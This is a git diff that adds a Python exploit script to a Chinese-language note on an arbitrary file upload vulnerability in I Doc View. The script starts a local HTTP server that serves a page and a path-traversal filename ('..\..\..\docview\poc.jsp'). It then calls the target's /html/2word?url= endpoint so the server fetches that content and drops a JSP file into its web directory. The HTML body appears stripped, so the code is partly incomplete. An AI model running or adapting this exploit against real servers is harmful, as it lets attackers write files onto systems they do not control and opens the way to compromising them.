diff --git a/I Doc View任意文件上传漏洞.md b/I Doc View任意文件上传漏洞.md
index 1660184..ddf8ff0 100644
--- a/I Doc View任意文件上传漏洞.md
+++ b/I Doc View任意文件上传漏洞.md
@@ -23,6 +23,74 @@ poc.html
+## 利用脚本
+```python
+import http.server
+import socketserver
+import sys
+import threading
+import requests
+
+visited_pages = {'/': False, '/..\..\..\docview\poc.jsp': False}
+
+class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
+ def do_GET(self):
+ global visited_pages
+ if self.path in visited_pages:
+ visited_pages[self.path] = True
+
+ if all(visited_pages.values()):
+ print("Success! Go to http://{}:{}/poc.jsp".format(remote_ip,remote_port))
+ threading.Thread(target=server.shutdown).start()
+
+ if self.path == '/':
+ self.send_response(200)
+ self.send_header("Content-type", "text/html")
+ self.end_headers()
+ html = f'''
+Index Page
+
+
+
+'''
+ self.wfile.write(html.encode('utf-8'))
+ elif self.path == '/..\..\..\docview\poc.jsp':
+ self.send_response(200)
+ self.send_header("Content-type", "text/html")
+ self.end_headers()
+ self.wfile.write(b"Poc Works!
")
+ else:
+ self.send_error(404, "File not found")
+
+ def log_message(self, format, *args):
+ return
+
+def send_request_to_remote():
+ remote_url = f'http://{remote_ip}:{remote_port}/html/2word?url={ip_address}:{port}'
+ try:
+ response = requests.get(remote_url)
+ except Exception as e:
+ pass
+
+if len(sys.argv) < 5:
+ print("Usage: python script.py ")
+ sys.exit(1)
+
+ip_address = sys.argv[1]
+port = int(sys.argv[2])
+remote_ip = sys.argv[3]
+remote_port = sys.argv[4]
+
+def start_server():
+ global server
+ server = socketserver.TCPServer((ip_address, port), MyHttpRequestHandler)
+ server.serve_forever()
+
+server_thread = threading.Thread(target=start_server)
+server_thread.start()
+
+send_request_to_remote()
+```
## 漏洞分析
```
https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg